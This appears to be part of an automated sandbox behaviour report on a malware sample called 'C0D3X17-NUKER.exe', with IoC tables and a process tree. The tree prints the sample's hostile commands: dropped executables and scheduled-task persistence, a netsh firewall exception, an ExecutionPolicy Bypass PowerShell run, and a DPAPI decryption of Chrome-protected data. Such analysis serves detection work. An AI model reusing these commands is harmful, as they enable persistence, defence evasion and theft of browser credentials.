Token: 34	4536	WMIC.exe
Token: 35	4536	WMIC.exe
Token: 36	4536	WMIC.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeIncreaseQuotaPrivilege	4536	WMIC.exe
Token: SeSecurityPrivilege	4536	WMIC.exe
Token: SeTakeOwnershipPrivilege	4536	WMIC.exe
Token: SeLoadDriverPrivilege	4536	WMIC.exe
Token: SeSystemProfilePrivilege	4536	WMIC.exe
Token: SeSystemtimePrivilege	4536	WMIC.exe
Token: SeProfSingleProcessPrivilege	4536	WMIC.exe
Token: SeIncBasePriorityPrivilege	4536	WMIC.exe
Token: SeCreatePagefilePrivilege	4536	WMIC.exe
Token: SeBackupPrivilege	4536	WMIC.exe
Token: SeRestorePrivilege	4536	WMIC.exe
Token: SeShutdownPrivilege	4536	WMIC.exe
Token: SeDebugPrivilege	4536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4536	WMIC.exe
Token: SeRemoteShutdownPrivilege	4536	WMIC.exe
Token: SeUndockPrivilege	4536	WMIC.exe
Token: SeManageVolumePrivilege	4536	WMIC.exe
Token: 33	4536	WMIC.exe
Token: 34	4536	WMIC.exe
Token: 35	4536	WMIC.exe
Token: 36	4536	WMIC.exe
Token: SeDebugPrivilege	408	powershell.exe
Token: SeIncreaseQuotaPrivilege	1060	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
2896	Stable_Network.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1040	msedge.exe
5596	msedge.exe
5940	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 748 wrote to memory of 1592	748	msedge.exe	86
PID 748 wrote to memory of 1592	748	msedge.exe	86
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 2420	748	msedge.exe	87
PID 748 wrote to memory of 4512	748	msedge.exe	88
PID 748 wrote to memory of 4512	748	msedge.exe	88
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89
PID 748 wrote to memory of 432	748	msedge.exe	89

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.mediafire.com/folder/kkoutc87ykjal/C0D3X17
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c44718
  2⤵
  PID:1592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
  2⤵
  PID:432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:3176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
  2⤵
  PID:1444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:1508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:8
  2⤵
  PID:1336
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
  2⤵
  PID:408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
  2⤵
  PID:4952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
  2⤵
  PID:984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:1
  2⤵
  PID:2604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
  2⤵
  PID:4124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:1
  2⤵
  PID:3784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6912 /prefetch:8
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7144 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4404 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2116,15017675321934121396,14911163024116766392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6788 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1040

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3808

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2840

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1664

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\C0D3X17 (123)\" -spe -an -ai#7zMap11193:88:7zEvent28711
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\C0D3X17 (123)\" -spe -an -ai#7zMap29177:88:7zEvent22524
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3200

C:\Users\Admin\Downloads\C0D3X17 (123)\C0D3X17\C0D3X17-NUKER.exe
"C:\Users\Admin\Downloads\C0D3X17 (123)\C0D3X17\C0D3X17-NUKER.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2844
- C:\Users\Admin\AppData\Roaming\rundl32.exe
  "C:\Users\Admin\AppData\Roaming\rundl32.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:220
- C:\Users\Admin\AppData\Roaming\Stable_Network.exe
  "C:\Users\Admin\AppData\Roaming\Stable_Network.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SendNotifyMessage
  PID:2896
- - C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
    C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:392
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2748
- C:\Users\Admin\AppData\Local\Temp\host.exe
  "C:\Users\Admin\AppData\Local\Temp\host.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4732
- - C:\ProgramData\GameSDK.exe
    "C:\ProgramData\GameSDK.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:4624
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\ProgramData\GameSDK.exe" "GameSDK.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:1536
- C:\Users\Admin\AppData\Local\Temp\system.dll.exe
  "C:\Users\Admin\AppData\Local\Temp\system.dll.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\3OfSRlVi78.ps1""
    3⤵
    PID:984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\3OfSRlVi78.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4164
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b5hljjod\b5hljjod.cmdline"
        5⤵
        
        PID:4748
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60EE.tmp" "c:\Users\Admin\AppData\Local\Temp\b5hljjod\CSCB7299D32906E43709E5546B63165B74F.TMP"
        6⤵
        
        PID:2796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1392
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
    3⤵
    PID:1696
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM msedge.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    3⤵
    PID:1032
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,111,11,152,43,226,32,145,73,137,243,42,18,79,120,126,126,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,241,173,50,248,48,233,4,229,245,201,146,154,115,98,33,115,73,47,145,149,219,0,76,224,75,238,207,77,243,118,177,201,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,36,144,200,68,162,221,179,194,26,103,200,200,85,181,197,147,65,240,114,77,146,124,55,46,108,10,161,238,71,0,78,7,48,0,0,0,156,77,116,228,75,203,177,250,227,93,81,127,228,115,6,183,240,205,136,99,238,243,170,198,71,189,51,118,193,34,101,52,151,58,240,142,129,23,129,118,83,129,205,128,158,223,219,198,64,0,0,0,249,223,58,23,28,104,226,94,161,154,21,121,253,209,176,1,240,233,220,232,89,251,132,38,156,9,151,153,25,81,61,189,122,16,236,108,252,247,143,85,136,120,142,14,33,105,40,81,30,203,46,2,241,141,19,71,126,65,251,155,4,135,68,82), $null, 'CurrentUser')"
    3⤵
